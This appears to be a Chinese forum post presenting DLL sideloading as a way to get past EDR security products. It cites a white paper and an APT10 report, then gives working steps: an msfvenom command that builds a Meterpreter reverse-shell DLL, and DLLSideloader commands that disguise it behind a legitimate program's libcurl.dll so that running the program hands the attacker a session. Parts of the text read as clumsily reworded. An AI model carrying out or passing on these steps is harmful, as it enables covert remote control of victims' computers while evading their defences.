Sideloading DLL攻击

今天看到了国外的一个白皮书,地址如下:

https://res.mdpi.com/d_attachment/jcp/jcp-01-00021/article_deploy/jcp-01-00021.pdf

内容主要是各类技术在遇到EDR时能不能胜利的绕过。

图片[1]-Sideloading DLL攻击-孤勇者社区

最后以一份表格总结了各类功用以及绕过效果:

图片[2]-Sideloading DLL攻击-孤勇者社区

我们能够看到,dll简直绕过了一切的EDR,而这里的DLL指的便是Sideloading DLL。

Sideloading DLL最早应该是在一份APT报告中被提出来的,即DLL侧加载。

文档地址:

https://www.recordedfuture.com/apt10-cyberespionage-campaign/?__cf_chl_jschl_tk__=pmd_VKrHUzdleNocPJnRemvxCVGmjY8gkMwlsZM361GthcI-1629625791-0-gqNtZGzNAjujcnBszQil

图片[3]-Sideloading DLL攻击-孤勇者社区
 

原理如下

图片[4]-Sideloading DLL攻击-孤勇者社区

即中间经过转发来加载歹意dll。

 


应用办法

首先找到一个存在dll加载(或劫持)的程序,然后运用msf生成dll

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f dll -a x86 > payload.dll

然后运用DLLSideloader来生成我们的转发dll,工具地址:

https://github.com/SkiddieTech/DLLSideloader

然后生成所需的文件即可

Invoke-DLLSideLoad libcurl.dll payload.dll

然后执行exe文件,即可获取session。

 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞14赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片